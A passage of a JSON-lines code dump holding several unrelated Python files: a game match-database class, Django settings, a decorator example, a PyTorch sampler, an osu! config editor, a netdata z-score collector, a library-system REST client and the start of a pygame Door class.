cur.close()\n return list(map(Match.from_tuple, matches))\n\n\n \"\"\" Gets all match ids in the DB. \"\"\"\n def find_all_ids(self):\n cur = self.db_connection.cursor()\n cur.execute(\"SELECT id FROM matches m WHERE NOT m.crashed\")\n matches = cur.fetchall()\n cur.close()\n return list(map(lambda x: x[0], matches))\n\n \n \"\"\" Gets all matches played by a given algo. \n \n Args :\n algo_id // The ID of the algo for whom you wish to see the matches.\n \"\"\"\n def find_for_algo(self, algo_id):\n cur = self.db_connection.cursor()\n cur.execute(\"SELECT * FROM matches m WHERE m.winner_id=%s OR m.loser_id=%s AND NOT m.crashed\", (algo_id, algo_id))\n matches = cur.fetchall()\n cur.close()\n return list(map(Match.from_tuple, matches))\n\n\n \"\"\" Gets all matches played by all algos of a given user. \n \n Arg\n username \n \"\"\"\n def find_for_user(self, username):\n cur = self.db_connection.cursor()\n cur.execute(\"SELECT m.* FROM matches m, algos a WHERE (m.winner_id=a.id OR m.loser_id=a.id) AND a.username=%s AND NOT m.crashed\", (username,))\n matches = cur.fetchall()\n cur.close()\n return list(map(Match.from_tuple, matches))\n\n\n \"\"\" Gets the IDS of all the matches played by a given algo. 
\n \n Args :\n algo_id // The ID of the algo for whom you wish to see the matches.\n \"\"\"\n def find_ids_for_algo(self, algo_id):\n cur = self.db_connection.cursor()\n cur.execute(\"SELECT id FROM matches m WHERE m.winner_id=%s OR m.loser_id=%s AND NOT m.crashed\", (algo_id, algo_id))\n matches = cur.fetchall()\n cur.close()\n return list(map(lambda x: x[0], matches))\n\n \n \"\"\" Updates a match.\n \n Args :\n match // A Match object\n \"\"\"\n def update_match(self, match):\n cur = self.db_connection.cursor()\n cur.execute(\n \"UPDATE matches m SET winner_id=%s, loser_id=%s, winner_side=%s, crashed=%s, date=%s WHERE m.id=%s\", \n (match.winner_id, match.loser_id, match.winner_side, match.crashed, match.date, match.id)\n )\n self.db_connection.commit()\n cur.close()\n \n","repo_name":"EtWnn/AlphaTerminal","sub_path":"tables/database/matchDatabase.py","file_name":"matchDatabase.py","file_ext":"py","file_size_in_byte":3558,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"2842032851","text":"import os\nfrom pathlib import Path\nfrom datetime import timedelta\nimport environ\nfrom celery.schedules import crontab\n\nBASE_DIR = Path(__file__).resolve().parent.parent\n\nSECRET_KEY = 'django-insecure-tecs=e2gh(szkng+pps5(jau58i5q-kv&al8d^7#m_4sj!lemk'\n\nDEBUG = True\n\nALLOWED_HOSTS = ['*']\nenv = environ.Env()\nenviron.Env.read_env()\n\nINSTALLED_APPS = [\n 'django.contrib.admin',\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.messages',\n 'django.contrib.staticfiles',\n 'rest_framework',\n 'app',\n 'django_filters',\n 'django_elasticsearch_dsl',\n 'django_elasticsearch_dsl_drf',\n 'storages',\n 'corsheaders',\n\n\n]\n\nREST_FRAMEWORK = {\n 'DEFAULT_PERMISSION_CLASSES': [\n 'rest_framework.permissions.DjangoModelPermissionsOrAnonReadOnly'\n ],\n 'DEFAULT_AUTHENTICATION_CLASSES': [\n 'rest_framework.authentication.SessionAuthentication',\n 'rest_framework_simplejwt.authentication.JWTAuthentication',\n ],\n\n}\n\nSIMPLE_JWT = {\n 'ACCESS_TOKEN_LIFETIME': timedelta(minutes=50),\n 'REFRESH_TOKEN_LIFETIME': timedelta(days=1),\n 'ROTATE_REFRESH_TOKENS': False,\n 'BLACKLIST_AFTER_ROTATION': False,\n 'UPDATE_LAST_LOGIN': False,\n\n 'ALGORITHM': 'HS256',\n 'SIGNING_KEY': SECRET_KEY,\n 'VERIFYING_KEY': None,\n 'AUDIENCE': None,\n 'ISSUER': None,\n 'JWK_URL': None,\n 'LEEWAY': 0,\n\n 'AUTH_HEADER_TYPES': ('Bearer',),\n 'AUTH_HEADER_NAME': 'HTTP_AUTHORIZATION',\n 'USER_ID_FIELD': 'id',\n 'USER_ID_CLAIM': 'user_id',\n 'USER_AUTHENTICATION_RULE': 'rest_framework_simplejwt.authentication.default_user_authentication_rule',\n\n 'AUTH_TOKEN_CLASSES': ('rest_framework_simplejwt.tokens.AccessToken',),\n 'TOKEN_TYPE_CLAIM': 'token_type',\n 'TOKEN_USER_CLASS': 'rest_framework_simplejwt.models.TokenUser',\n\n 'JTI_CLAIM': 'jti',\n\n 'SLIDING_TOKEN_REFRESH_EXP_CLAIM': 'refresh_exp',\n 'SLIDING_TOKEN_LIFETIME': timedelta(minutes=30),\n 'SLIDING_TOKEN_REFRESH_LIFETIME': timedelta(days=1),\n}\n\nMIDDLEWARE = [\n 'django.middleware.security.SecurityMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'corsheaders.middleware.CorsMiddleware',\n 'django.middleware.common.CommonMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n 'django.middleware.clickjacking.XFrameOptionsMiddleware',\n\n]\n\nROOT_URLCONF = 'iRating.urls'\n\nTEMPLATES = [\n {\n 'BACKEND': 
'django.template.backends.django.DjangoTemplates',\n 'DIRS': [],\n 'APP_DIRS': True,\n 'OPTIONS': {\n 'context_processors': [\n 'django.template.context_processors.debug',\n 'django.template.context_processors.request',\n 'django.contrib.auth.context_processors.auth',\n 'django.contrib.messages.context_processors.messages',\n ],\n },\n },\n]\n\nWSGI_APPLICATION = 'iRating.wsgi.application'\n\nDATABASES = {\n 'default': {\n 'ENGINE': os.environ.get('POSTGRES_ENGINE'),\n 'NAME': os.environ.get('POSTGRES_DATABASE'),\n 'USER': os.environ.get('POSTGRES_USER'),\n 'PASSWORD': os.environ.get('POSTGRES_PASSWORD'),\n 'HOST': os.environ.get('POSTGRES_HOST'),\n 'PORT': os.environ.get('POSTGRES_PORT'),\n }\n}\n\n\nAUTH_PASSWORD_VALIDATORS = [\n {\n 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',\n },\n {\n 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',\n },\n]\n\nREST_FRAMEWORK = {\n 'DEFAULT_AUTHENTICATION_CLASSES': (\n 'rest_framework_simplejwt.authentication.JWTAuthentication',\n )\n}\n\nLANGUAGE_CODE = 'en-us'\n\nTIME_ZONE = 'UTC'\n\nUSE_I18N = True\n\nUSE_TZ = True\n\n\nSTATIC_ROOT = os.path.join(BASE_DIR, 'static')\nMEDIA_ROOT = os.path.join(BASE_DIR, 'media')\n\n# AWS_ACCESS_KEY_ID = env('AWS_ACCESS_KEY_ID')\n# AWS_SECRET_ACCESS_KEY = env('AWS_SECRET_ACCESS_KEY')\n# AWS_STORAGE_BUCKET_NAME = env('AWS_STORAGE_BUCKET_NAME')\n# AWS_S3_OBJECT_PARAMETERS = {'CacheControl': 'max-age=86400'}\n# AWS_CUSTOM_DOMAIN = env('AWS_CUSTOM_DOMAIN')\n# AWS_S3_FILE_OVERWRITE = True\n\n# DEFAULT_FILE_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage'\n# STATIC_FILE_STORAGE = 'storages.backends.s3boto3.S3StaticStorage'\n\n\nSTATIC_URL = 'static/'\nMEDIA_URL = 'media/'\n\n\nDEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'\n\nCELERY_BROKER_URL = os.environ.get(\"CELERY_BROKER\", \"amqp://guest@rabbitmq//\")\nCELERY_RESULT_BACKEND = os.environ.get(\"CELERY_BACKEND\", \"redis://redis:6379/0\")\n\nELASTICSEARCH_DSL = {\n 'default': {\n 'hosts': 'elasticsearch',\n 'size': 1000,\n }\n}\n\nCORS_ALLOW_ALL_ORIGINS = True\n\n# CELERY_BEAT_SCHEDULE = {\n# \"web_srap_ifood\": {\n# \"task\": \"web_scrap_ifood\",\n# \"schedule\": crontab(hour='*/24')\n# }}\n","repo_name":"Vitor-Roma/iRating","sub_path":"iRating/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":5122,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"25898558159","text":"import time\nimport math\n\ndef zamanHesap(fonk):\n def icFonk(*args,**kwargs):\n begin = time.time()\n fonk(*args,**kwargs)\n end = time.time()\n print(\"bu işlem sırasında geçen zaman:\",fonk.__name__,end-begin)\n\n return icFonk\n\n@zamanHesap\ndef Faktoriyel(param):\n time.sleep(2)\n print(math.factorial(param))\n\n@zamanHesap\ndef ConCat(*args):\n sonuc = \"\"\n for item in args:\n sonuc += \";\" + item\n print(sonuc)\n\n@zamanHesap\ndef JoinBir(*args):\n sonuc = \"\"\n sonuc = \";\".join(args)\n print(sonuc)\n\nJoinBir(\"ali\",\"veli\",\"ayşe\")\nConCat(\"ali\",\"veli\",\"ayşe\")","repo_name":"VektorelPythonHIA23/pythontemel","sub_path":"OOP/Decaorators.py","file_name":"Decaorators.py","file_ext":"py","file_size_in_byte":610,"program_lang":"python","lang":"tr","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"27260532224","text":"import 
json\nimport logging\nimport numpy as np\nimport os\nimport random\nimport string\nimport torch\n\n\nclass SizeAwareSampler(torch.utils.data.Sampler):\n \"\"\"Returns a batch with the specified total length.\n\n from David Gaddy's\n https://github.com/dgaddy/silent_speech/blob/main/read_emg.py\n \"\"\"\n def __init__(self, audio_lens, max_len=2000):\n self.audio_lens = audio_lens\n self.max_len = max_len\n\n def __iter__(self):\n indices = list(range(len(self.audio_lens)))\n random.shuffle(indices)\n batch = []\n batch_length = 0\n for idx in indices:\n length = self.audio_lens[idx]\n if length > self.max_len:\n logging.warning(f'Warning: example {idx} cannot fit within desired batch length')\n if length + batch_length > self.max_len:\n yield batch\n batch = []\n batch_length = 0\n batch.append(idx)\n batch_length += length\n # dropping last incomplete batch\n","repo_name":"articulatory/articulatory","sub_path":"articulatory/samplers/pytorch_samplers.py","file_name":"pytorch_samplers.py","file_ext":"py","file_size_in_byte":1027,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"83"} +{"seq_id":"19323038774","text":"\nimport PySimpleGUI as sg\n\nsg.theme('DarkAmber') # set the design theme\n\n# components to place in the window\nlayout = [\n [sg.Text(' config.cfg path', size=(15, 2))],\n [sg.FileBrowse(' ファイルを選択 ', key='inputFilePath')],\n [sg.InputText(size=(19, 1))],\n [sg.Text(' 縦幅 (Height)')],\n [sg.InputText(size=(19, 1))],\n [sg.Text(' 横幅 (Width) ')], \n [sg.InputText(size=(19,1))],\n [sg.Button(' change '), sg.Button(' cancel ')] ]\n\n# create the window\nwindow = sg.Window('osu! resolution changer', layout)\n\n# event loop\nwhile True:\n event, values = window.read()\n if event == sg.WIN_CLOSED or event == ' cancel ':\n break\n elif event == ' change ':\n with open(values['inputFilePath'], encoding='shift_jis') as f:\n l = f.readlines()\n l[89] = \"Height = \" + values[1] + \"\\n\"\n l[90] = \"Width = \" + values[2] + \"\\n\" \n with open(values['inputFilePath'], 'w', encoding='shift_jis') as f:\n for d in l:\n f.write(d) \n break \n\n\nwindow.close()\n\n\n\n\n\n","repo_name":"sea-mods/python","sub_path":"guirennsyuu.py","file_name":"guirennsyuu.py","file_ext":"py","file_size_in_byte":1218,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"38752768895","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport pickle\n\nimport os\nimport sys\n\nfile_path = os.path.abspath(__file__)\nproject_dir = os.path.join(file_path.split('ALModel_dev')[0], 'ALModel_dev')\n\nsensitivity_analysis_dir = os.path.join(project_dir, 'sensitivity_analysis')\nsaved_sims_dir = os.path.join(sensitivity_analysis_dir, 'save_sims_sensitivity_sweep')\n\n## map simulation time tags to run condition\n\nbase_timetag = {'2022_11_9-11_33_0': 'base'}\n\nd_0p25_timetags = {\n\t'2022_11_9-11_34_16': 'ORN x3/4',\n\t'2022_11_9-11_34_28': 'eLN x3/4',\n\t'2022_11_9-11_35_9': 'iLN x3/4',\n\t'2022_11_9-11_35_16': 'PN x3/4',\n\n\t'2022_11_10-12_24_10': 'ORN x4/3',\n\t'2022_11_9-14_20_45': 'eLN x4/3',\n\t'2022_11_10-12_24_24': 'iLN x4/3',\n\t'2022_11_9-15_51_49': 'PN x4/3',\n}\n\nd_0p5_timetags = {\n\t'2022_11_10-17_17_4': 'ORN x1/2',\n\t'2022_11_10-17_17_35': 'eLN x1/2',\n\t'2022_11_10-17_17_41': 'iLN x1/2',\n\t'2022_11_10-17_17_50': 'PN x1/2',\n\n\t'2022_11_10-17_18_14': 'ORN x2',\n\t'2022_11_10-17_18_20': 'eLN x2',\n\t'2022_11_10-17_18_43': 'iLN x2',\n\t'2022_11_10-17_18_50': 'PN x2',\n}\n\nd_0p75_timetags = {\n\t'2022_11_10-17_24_27': 'ORN 
x1/4',\n\t'2022_11_10-17_24_34': 'eLN x1/4',\n\t'2022_11_11-9_42_0': 'iLN x1/4',\n\t'2022_11_11-10_31_7': 'PN x1/4',\n\n\t'2022_11_10-17_24_58': 'ORN x4',\n\t'2022_11_10-17_26_55': 'eLN x4',\n\t'2022_11_10-17_27_23': 'iLN x4',\n\t'2022_11_10-17_27_30': 'PN x4',\n}\n\ntimetag_sets = [base_timetag, d_0p25_timetags, d_0p5_timetags, d_0p75_timetags]\ntimetag_set_paths_local = ['sensitivity_base',\n\t\t\t\t\t 'sensitivity_0p25/single_param', \n\t\t\t\t\t 'sensitivity_0p5/single_param', \n\t\t\t\t\t 'sensitivity_0p75/single_param'] \ntimetag_set_paths_abs = [os.path.join(saved_sims_dir, d) for d in timetag_set_paths_local]\n\n\nn_sets = len(timetag_sets)\n\nfor iis in range(n_sets):\n\n\tcur_timetag_set = timetag_sets[iis]\n\tcur_timetag_local = timetag_set_paths_local[iis]\n\tcur_timetag_path = timetag_set_paths_abs[iis]\n\n\tprint('processing {}...'.format(cur_timetag_local))\n\n\tsim_dir_path = os.path.join(saved_sims_dir, cur_timetag_local)\n\n\tsim_dirs = os.listdir(sim_dir_path)\n\n\trun_timetags = list(cur_timetag_set.keys())\n\trun_names = list(cur_timetag_set.values())\n\n\tn_runs = len(run_timetags)\n\n\td_sensitivity_res = {}\n\tfor ir in range(n_runs):\n\t\tcur_timetag = run_timetags[ir]\n\t\tcur_name = run_names[ir]\n\n\t\trun_dir_local = [d for d in sim_dirs if cur_timetag in d][0]\n\t\trun_dir_abs = os.path.join(sim_dir_path, run_dir_local)\n\n\t\trun_dir_files = [os.path.join(run_dir_abs, f) for f in os.listdir(run_dir_abs)]\n\t\trun_df_AL_activity_f = [f for f in run_dir_files if 'df_AL_activity' in f][0]\n\t\trun_df_AL_activity = pd.read_csv(run_df_AL_activity_f)\n\n\t\td_sensitivity_res[cur_name] = run_df_AL_activity\n\n\tres_file = os.path.join(sensitivity_analysis_dir, 'analysis/',\n\t\t\t\t\t\t\tcur_timetag_local.replace('/', '')+'_df_AL_activitys.p')\n\tpickle.dump(d_sensitivity_res, open(res_file, 'wb'))","repo_name":"dlavrent/ALVariability","sub_path":"sensitivity_analysis/analyze_sensitivity_sweep.py","file_name":"analyze_sensitivity_sweep.py","file_ext":"py","file_size_in_byte":2877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"70406278993","text":"# -*- coding: utf-8 -*-\n# Description: zscores netdata python.d module\n# Author: andrewm4894\n# SPDX-License-Identifier: GPL-3.0-or-later\n\nfrom datetime import datetime\nimport re\n\nimport requests\nimport numpy as np\nimport pandas as pd\n\nfrom bases.FrameworkServices.SimpleService import SimpleService\nfrom netdata_pandas.data import get_data, get_allmetrics\n\npriority = 60000\nupdate_every = 5\ndisabled_by_default = True\n\nORDER = [\n 'z',\n '3stddev'\n]\n\nCHARTS = {\n 'z': {\n 'options': ['z', 'Z Score', 'z', 'Z Score', 'zscores.z', 'line'],\n 'lines': []\n },\n '3stddev': {\n 'options': ['3stddev', 'Z Score >3', 'count', '3 Stddev', 'zscores.3stddev', 'stacked'],\n 'lines': []\n },\n}\n\n\nclass Service(SimpleService):\n def __init__(self, configuration=None, name=None):\n SimpleService.__init__(self, configuration=configuration, name=name)\n self.host = self.configuration.get('host', '127.0.0.1:19999')\n self.charts_regex = re.compile(self.configuration.get('charts_regex', 'system.*'))\n self.charts_to_exclude = self.configuration.get('charts_to_exclude', '').split(',')\n self.charts_in_scope = [\n c for c in\n list(filter(self.charts_regex.match,\n requests.get(f'http://{self.host}/api/v1/charts').json()['charts'].keys()))\n if c not in self.charts_to_exclude\n ]\n self.train_secs = self.configuration.get('train_secs', 14400)\n self.offset_secs 
= self.configuration.get('offset_secs', 300)\n self.train_every_n = self.configuration.get('train_every_n', 900)\n self.z_smooth_n = self.configuration.get('z_smooth_n', 15)\n self.z_clip = self.configuration.get('z_clip', 10)\n self.z_abs = bool(self.configuration.get('z_abs', True))\n self.burn_in = self.configuration.get('burn_in', 2)\n self.mode = self.configuration.get('mode', 'per_chart')\n self.per_chart_agg = self.configuration.get('per_chart_agg', 'mean')\n self.order = ORDER\n self.definitions = CHARTS\n self.collected_dims = {'z': set(), '3stddev': set()}\n self.df_mean = pd.DataFrame()\n self.df_std = pd.DataFrame()\n self.df_z_history = pd.DataFrame()\n\n def check(self):\n _ = get_allmetrics(self.host, self.charts_in_scope, wide=True, col_sep='.')\n return True\n\n def validate_charts(self, chart, data, algorithm='absolute', multiplier=1, divisor=1):\n \"\"\"If dimension not in chart then add it.\n \"\"\"\n for dim in data:\n if dim not in self.collected_dims[chart]:\n self.collected_dims[chart].add(dim)\n self.charts[chart].add_dimension([dim, dim, algorithm, multiplier, divisor])\n\n for dim in list(self.collected_dims[chart]):\n if dim not in data:\n self.collected_dims[chart].remove(dim)\n self.charts[chart].del_dimension(dim, hide=False)\n\n def train_model(self):\n \"\"\"Calculate the mean and stddev for all relevant metrics and store them for use in calulcating zscore at each timestep.\n \"\"\"\n before = int(datetime.now().timestamp()) - self.offset_secs\n after = before - self.train_secs\n\n self.df_mean = get_data(\n self.host, self.charts_in_scope, after, before, points=10, group='average', col_sep='.'\n ).mean().to_frame().rename(columns={0: \"mean\"})\n\n self.df_std = get_data(\n self.host, self.charts_in_scope, after, before, points=10, group='stddev', col_sep='.'\n ).mean().to_frame().rename(columns={0: \"std\"})\n\n def create_data(self, df_allmetrics):\n \"\"\"Use x, mean, stddev to generate z scores and 3stddev flags via some pandas manipulation.\n Returning two dictionaries of dimensions and measures, one for each chart.\n\n :param df_allmetrics : pandas dataframe with latest data from api/v1/allmetrics.\n :return: (,) tuple of dictionaries, one for zscores and the other for a flag if abs(z)>3.\n \"\"\"\n # calculate clipped z score for each available metric\n df_z = pd.concat([self.df_mean, self.df_std, df_allmetrics], axis=1, join='inner')\n df_z['z'] = ((df_z['value'] - df_z['mean']) / df_z['std']).clip(-self.z_clip, self.z_clip).fillna(0) * 100\n if self.z_abs:\n df_z['z'] = df_z['z'].abs()\n\n # append last z_smooth_n rows of zscores to history table in wide format\n self.df_z_history = self.df_z_history.append(\n df_z[['z']].reset_index().pivot_table(values='z', columns='index'), sort=True\n ).tail(self.z_smooth_n)\n\n # get average zscore for last z_smooth_n for each metric\n df_z_smooth = self.df_z_history.melt(value_name='z').groupby('index')['z'].mean().to_frame()\n df_z_smooth['3stddev'] = np.where(abs(df_z_smooth['z']) > 300, 1, 0)\n data_z = df_z_smooth['z'].add_suffix('_z').to_dict()\n\n # aggregate to chart level if specified\n if self.mode == 'per_chart':\n df_z_smooth['chart'] = ['.'.join(x[0:2]) + '_z' for x in df_z_smooth.index.str.split('.').to_list()]\n if self.per_chart_agg == 'absmax':\n data_z = \\\n list(df_z_smooth.groupby('chart').agg({'z': lambda x: max(x, key=abs)})['z'].to_dict().values())[0]\n else:\n data_z = list(df_z_smooth.groupby('chart').agg({'z': [self.per_chart_agg]})['z'].to_dict().values())[0]\n\n data_3stddev = 
{}\n for k in data_z:\n data_3stddev[k.replace('_z', '')] = 1 if abs(data_z[k]) > 300 else 0\n\n return data_z, data_3stddev\n\n def get_data(self):\n\n if self.runs_counter <= self.burn_in or self.runs_counter % self.train_every_n == 0:\n self.train_model()\n\n data_z, data_3stddev = self.create_data(\n get_allmetrics(self.host, self.charts_in_scope, wide=True, col_sep='.').transpose())\n data = {**data_z, **data_3stddev}\n\n self.validate_charts('z', data_z, divisor=100)\n self.validate_charts('3stddev', data_3stddev)\n\n return data\n","repo_name":"netdata/netdata","sub_path":"collectors/python.d.plugin/zscores/zscores.chart.py","file_name":"zscores.chart.py","file_ext":"py","file_size_in_byte":6126,"program_lang":"python","lang":"en","doc_type":"code","stars":66015,"dataset":"github-code","pt":"83"} +{"seq_id":"39379205335","text":"# @Author: lym12321\r\n# @Date: 2022-08-29\r\n\r\nfrom requests import session\r\nimport json\r\n\r\nrequests = session() # this keeps cookies; usage is the same as requests\r\n\r\nbaseUrl = '' # server api address\r\n\r\nheaders = {'Content-Type' : 'application/json'}\r\n\r\n# fixed return format for the api\r\ndef ret(code, msg):\r\n return {'code': code, 'msg': msg}\r\n\r\n# log in to the system\r\n# username: login name\r\n# password: login password\r\ndef login(username, password):\r\n data = {\r\n 'strUserName': username,\r\n 'strPassword': password,\r\n 'strParameters': 'type=worker,client=REST|0.01'\r\n }\r\n try:\r\n r = requests.post(f'{baseUrl}/login', data=json.dumps(data), headers=headers)\r\n j = json.loads(r.text)\r\n if j['LoginResult']['ErrorCode'] != 0:\r\n return ret(j['LoginResult']['ErrorCode'], j['LoginResult']['ErrorInfo'])\r\n return ret(0, j)\r\n except Exception as e:\r\n return ret(-1, e)\r\n\r\n# log out of the system\r\ndef logout(): \r\n try:\r\n r = requests.post(f'{baseUrl}/logout')\r\n return ret(0, json.loads(r.text))\r\n except Exception as e:\r\n return ret(-1, e)\r\n\r\n# get reader information\r\n# barcode: reader card barcode\r\n# retType: format of the returned information\r\ndef getReaderInfo(barcode, retType):\r\n data = {\r\n 'strBarcode': barcode,\r\n 'strResultTypeList': retType\r\n }\r\n try:\r\n r = requests.post(f'{baseUrl}/getReaderInfo', data=json.dumps(data), headers=headers)\r\n j = json.loads(r.text)\r\n if j['GetReaderInfoResult']['ErrorCode'] != 0:\r\n return ret(j['GetReaderInfoResult']['ErrorCode'], j['GetReaderInfoResult']['ErrorInfo'])\r\n return ret(0, j['results'][0])\r\n except Exception as e:\r\n return ret(-1, e)\r\n\r\n# get book summary\r\ndef getBiblioSummary(barcode):\r\n data = {\r\n 'strItemBarcode': barcode\r\n }\r\n try:\r\n r = requests.post(f'{baseUrl}/getBiblioSummary', data=json.dumps(data), headers=headers)\r\n j = json.loads(r.text)\r\n if j['GetBiblioSummaryResult']['ErrorCode'] != 0:\r\n return ret(j['GetBiblioSummaryResult']['ErrorCode'], j['GetBiblioSummaryResult']['ErrorInfo'])\r\n return ret(0, j)\r\n except Exception as e:\r\n return ret(-1, e)\r\n\r\n# get detailed book information\r\n# retType: xml/html/@price/@accessno\r\ndef getBiblioInfo(recPath, retType):\r\n data = {\r\n 'strBiblioRecPath': recPath,\r\n 'strBiblioType': retType\r\n }\r\n try:\r\n r = requests.post(f'{baseUrl}/getBiblioInfo', data=json.dumps(data), headers=headers)\r\n j = json.loads(r.text)\r\n if j['GetBiblioInfoResult']['ErrorCode'] != 0:\r\n return ret(j['GetBiblioInfoResult']['ErrorCode'], j['GetBiblioInfoResult']['ErrorInfo'])\r\n return ret(0, j['strBiblio'])\r\n except Exception as e:\r\n return ret(-1, e)\r\n\r\n# borrow or renew a book\r\n# reader: reader card barcode\r\n# barcode: book item barcode\r\n# if cont = True, this is a renewal\r\ndef Borrow(reader, barcode, cont = False):\r\n data = {\r\n 'bRenew': cont,\r\n 
'strReaderBarcode': reader,\r\n 'strItemBarcode': barcode,\r\n 'bForce': False\r\n }\r\n try:\r\n r = requests.post(f'{baseUrl}/Borrow', data=json.dumps(data), headers=headers)\r\n j = json.loads(r.text)\r\n if j['BorrowResult']['ErrorCode'] != 0:\r\n return ret(j['BorrowResult']['ErrorCode'], j['BorrowResult']['ErrorInfo'])\r\n return ret(0, j)\r\n except Exception as e:\r\n return ret(-1, e)\r\n\r\n# return a book\r\n# barcode: book barcode\r\ndef Return(barcode):\r\n data = {\r\n 'strAction': 'return',\r\n 'strItemBarcode': barcode\r\n }\r\n try:\r\n r = requests.post(f'{baseUrl}/Return', data=json.dumps(data), headers=headers)\r\n j = json.loads(r.text)\r\n if j['ReturnResult']['ErrorCode'] != 0:\r\n return ret(j['ReturnResult']['ErrorCode'], j['ReturnResult']['ErrorInfo'])\r\n return ret(0, j)\r\n except Exception as e:\r\n return ret(-1, e)\r\n\r\n# search reader records and save them to a result set (default: default)\r\n# keyword: search term\r\n# matchStyle: match style (left/middle/right/exact)\r\n# matchFrom: search access point (/card barcode/name/...)\r\n# @return: number of hits\r\ndef searchReader(keyword, matchStyle = 'middle', matchFrom = '', resultSetName = 'default'):\r\n data = {\r\n 'strReaderDbNames': '',\r\n 'strQueryWord': keyword,\r\n 'nPerMax': -1,\r\n 'strFrom': matchFrom,\r\n 'strMatchStyle': matchStyle,\r\n 'strResultSetName': resultSetName\r\n }\r\n try:\r\n r = requests.post(f'{baseUrl}/searchReader', data=json.dumps(data), headers=headers)\r\n j = json.loads(r.text)\r\n if j['SearchReaderResult']['ErrorCode'] != 0:\r\n return ret(j['SearchReaderResult']['ErrorCode'], j['SearchReaderResult']['ErrorInfo'])\r\n return ret(0, j['SearchReaderResult']['Value'])\r\n except Exception as e:\r\n return ret(-1, e)\r\n\r\n# search bibliographic records\r\n# keyword: search term\r\n# matchStyle: match style (left/middle/right/exact)\r\n# matchFrom: search access point (/ISBN/title/...)\r\n# @return: number of hits\r\ndef searchBiblio(keyword, matchStyle = 'middle', matchFrom = '', resultSetName = 'default'):\r\n data = {\r\n 'strBiblioDbNames': '',\r\n 'strQueryWord': keyword,\r\n 'nPerMax': -1,\r\n 'strFromStyle': matchFrom,\r\n 'strMatchStyle': matchStyle,\r\n 'strResultSetName': resultSetName\r\n }\r\n try:\r\n r = requests.post(f'{baseUrl}/searchBiblio', data=json.dumps(data), headers=headers)\r\n j = json.loads(r.text)\r\n if j['SearchBiblioResult']['ErrorCode'] != 0:\r\n return ret(j['SearchBiblioResult']['ErrorCode'], j['SearchBiblioResult']['ErrorInfo'])\r\n return ret(0, j['SearchBiblioResult']['Value'])\r\n except Exception as e:\r\n return ret(-1, e)\r\n\r\n# fetch a given number of search results from the result set, starting at a given offset\r\n# start: starting record, counting from 0\r\n# count: number of records; when count = -1, fetch as many results as possible\r\n# for the reader database, @return: [{'Cols': [card barcode, name, status, reader type, unit, ID number, card number, expiry date]}]\r\n# for the book database, @return: [{'Cols': [path, title, author, publisher, publication date, CLC class number, subject terms, keywords, ISBN]}]\r\ndef getSearchResult(start, count, resultSetName = 'default'):\r\n data = {\r\n 'strResultSetName': resultSetName,\r\n 'lStart': start,\r\n 'lCount': count,\r\n 'strBrowseInfoStyle': 'id,cols'\r\n }\r\n try:\r\n r = requests.post(f'{baseUrl}/getSearchResult', data=json.dumps(data), headers=headers)\r\n j = json.loads(r.text)\r\n if j['GetSearchResultResult']['ErrorCode'] != 0:\r\n return ret(j['GetSearchResultResult']['ErrorCode'], j['GetSearchResultResult']['ErrorInfo'])\r\n return ret(0, {'count': j['GetSearchResultResult']['Value'], 'results': j['searchresults']})\r\n except Exception as e:\r\n return ret(-1, e)\r\n\r\n# get the item records under one bibliographic record\r\n# recPath: bibliographic record path\r\n# start: starting point of the query, counting from 0\r\n# count: number of records to query; when count = -1, fetch as many results as possible\r\ndef getEntities(recPath, start, count):\r\n data = {\r\n 'strBiblioRecPath': recPath,\r\n 'lStart': start,\r\n 
'lCount': count,\r\n 'strStyle': 'onlygetpath'\r\n }\r\n try:\r\n r = requests.post(f'{baseUrl}/getEntities', data=json.dumps(data), headers=headers)\r\n j = json.loads(r.text)\r\n if j['GetEntitiesResult']['ErrorCode'] != 0:\r\n return ret(j['GetEntitiesResult']['ErrorCode'], j['GetEntitiesResult']['ErrorInfo'])\r\n return ret(0, {'count': j['GetEntitiesResult']['Value'], 'results': j['entityinfos']})\r\n except Exception as e:\r\n return ret(-1, e)\r\n\r\n# get entity (item) record information\r\n# barcode: item barcode\r\n# retType: return type\r\ndef getItemInfo(barcode, retType):\r\n data = {\r\n 'strBarcode': barcode,\r\n 'strResultType': retType\r\n }\r\n try:\r\n r = requests.post(f'{baseUrl}/getItemInfo', data=json.dumps(data), headers=headers)\r\n j = json.loads(r.text)\r\n if j['GetItemInfoResult']['ErrorCode'] != 0:\r\n return ret(j['GetItemInfoResult']['ErrorCode'], j['GetItemInfoResult']['ErrorInfo'])\r\n # return ret(0, {'count': j['GetItemInfoResult']['Value'], 'results': j['entityinfos']})\r\n return ret(0, j['strResult'])\r\n except Exception as e:\r\n return ret(-1, e)\r\n","repo_name":"lym12321/dp2-API","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":8486,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"83"} +{"seq_id":"23431201551","text":"import pygame\nfrom model.event_box import EventBox\n\n\nclass Door(EventBox):\n \"\"\"\n Door that lets the player move on to the next level.\n Triggers when the player collides with it.\n\n Parameters:\n - scene: scene the door belongs to\n - x, y: position of the door\n - groups: tuple of groups the door belongs to\n \"\"\"\n\n def __init__(self, scene, x, y, groups):\n self.scene = scene\n\n self.image_closed = 